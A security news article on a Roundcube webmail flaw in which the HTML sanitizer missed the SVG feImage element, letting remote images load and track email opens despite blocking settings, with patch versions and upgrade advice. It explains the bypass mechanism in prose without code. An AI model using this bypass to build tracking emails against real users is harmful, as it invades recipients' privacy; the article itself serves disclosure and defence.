Roundcube, a widely used open-source webmail application, has issued essential security patches to fix a privacy vulnerability that could allow attackers to monitor email opens.
Understanding the Roundcube Vulnerability
The vulnerability, highlighted by NULL CATHEDRAL, permitted malicious actors to load remote images in emails. This was possible even when users had configured their settings to block such images. This flaw affected Roundcube Webmail versions earlier than 1.5.13 and all 1.6.x versions before 1.6.13. The patches, released on February 8, 2026, address this security concern.
The issue originated in Roundcube’s HTML sanitizer, known as rcube_washtml, which is designed to remove potentially harmful elements from incoming emails. When a user disables remote content loading by setting allow_remote to false, the sanitizer checks HTML attributes that could load external resources. The function is_image_attribute() is responsible for this check, sanitizing URLs linked to src or href attributes to prevent external requests.
The Mechanism of Exploitation
The problem arose because the sanitizer did not identify the SVG element feimage as an image source. The feimage element, an SVG filter primitive, can fetch image data through its href attribute. Since the function wash_link() treated this href like a regular link, it allowed the external connection.
This oversight allowed attackers to embed a tiny, invisible SVG in an email. When the email was opened, the SVG’s filter would automatically make a GET request to a server controlled by the attacker. This exploit could reveal active email addresses, log IP addresses, and even gather data about the recipient’s browser and device.
Implementing the Security Fix
To counteract this vulnerability, the fix involved updating the regex logic within the is_image_attribute() function. The new logic explicitly identifies feimage, along with image and use elements, when examining href attributes. This change ensures that any attempt to load external resources via SVG filters is blocked by the sanitizer’s strict rules.
Administrators managing self-hosted Roundcube instances are strongly advised to upgrade to version 1.5.13 or 1.6.13 without delay to safeguard user privacy.
Stay informed about the latest cybersecurity news by following us on Google News, LinkedIn, and X. For inquiries or to feature your stories, contact us.
